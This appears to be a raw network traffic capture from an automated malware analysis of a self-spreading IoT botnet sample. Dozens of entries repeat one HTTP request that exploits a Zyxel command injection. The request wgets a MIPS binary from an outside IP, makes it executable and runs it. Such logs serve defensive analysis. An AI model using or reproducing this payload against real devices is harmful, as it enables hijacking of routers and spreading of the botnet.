                                          Jan 14, 2024 15:46:25.197390079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6563192.168.2.2345982152.34.233.152443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.197412968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6564192.168.2.234754266.166.11.136443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.197444916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6565192.168.2.2354448208.100.85.212443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.197470903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6566192.168.2.2347238119.208.94.141443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.197515965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6567192.168.2.235333272.108.168.150443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.197554111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6568192.168.2.2346622118.253.108.251443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.197577000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6569192.168.2.2352660123.80.162.105443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.197606087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6570192.168.2.2355070131.139.78.79443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.197633982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6571192.168.2.2353028117.57.95.176443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.197685003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6572192.168.2.2355584170.144.58.101443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.197715998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6573192.168.2.235692453.22.159.127443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.197731972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6574192.168.2.233563651.90.222.80443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.197786093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6575192.168.2.235140698.198.122.39443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.197807074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6576192.168.2.235049491.252.159.30443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.197839022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6577192.168.2.2351570174.107.66.122443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.197861910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6578192.168.2.234598866.114.154.124443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.197906017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6579192.168.2.235348212.216.239.247443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.197933912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6580192.168.2.235168236.48.90.228443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.197967052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6581192.168.2.2343328220.183.54.241443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.197990894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6582192.168.2.235481688.197.75.47443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.198018074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6583192.168.2.2332892114.131.118.15443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.198028088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6584192.168.2.2350928170.24.3.185443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.198045015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6585192.168.2.234224267.198.30.155443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.198091984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6586192.168.2.2355282148.66.103.164443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.198115110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6587192.168.2.234533495.224.157.255443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.198152065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6588192.168.2.234671882.121.184.248443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.198160887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6589192.168.2.2348178128.72.186.87443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.198201895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6590192.168.2.2360728202.5.72.136443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.198232889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6591192.168.2.233465871.254.234.202443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.198260069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6592192.168.2.2354446209.121.47.17443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.198282957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6593192.168.2.2353496106.244.93.13443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.198333025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6594192.168.2.2358978175.192.232.59443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.198357105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6595192.168.2.233966464.194.142.110443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.198395967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6596192.168.2.234121293.14.72.59443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.198405027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6597192.168.2.2346792180.101.216.48443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.198419094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6598192.168.2.234853423.201.251.131443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.198462963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6599192.168.2.2359890213.124.38.68443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.198476076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6600192.168.2.2354354126.155.104.38443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.198519945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6601192.168.2.2347278164.58.198.59443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.198550940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6602192.168.2.235990417.164.194.238443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.198574066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6603192.168.2.235751475.151.168.9443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.198609114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6604192.168.2.2347822218.220.52.229443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.198632002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6605192.168.2.2343004135.207.107.100443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.198657990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6606192.168.2.2348250223.92.162.219443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.198685884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6607192.168.2.234474632.166.18.234443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.198702097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6608192.168.2.2346194148.65.212.49443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.198731899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6609192.168.2.2358228163.81.161.210443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.198734999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6610192.168.2.234890017.245.25.15443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.198776007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6611192.168.2.2344184191.161.123.74443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.198818922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6612192.168.2.2354668111.136.180.8443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.198824883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6613192.168.2.234629432.36.106.60443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.198854923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6614192.168.2.235948841.104.67.220443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.198901892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6615192.168.2.2341922126.37.179.240443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.198911905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6616192.168.2.234556479.103.112.9443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.198940039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6617192.168.2.2340174122.224.255.150443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.198985100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6618192.168.2.2347864210.62.84.128443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.199023962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6619192.168.2.2348778179.33.58.184443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.199043036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6620192.168.2.235542624.158.23.202443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.199069023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6621192.168.2.2351400220.238.196.207443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.199125051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6622192.168.2.2333336182.255.36.44443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.199136019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6623192.168.2.235780871.141.246.246443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.199172020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6624192.168.2.234177614.117.113.100443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.199192047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6625192.168.2.2354842124.209.61.215443
                                          TimestampBytes transferredDirectionData
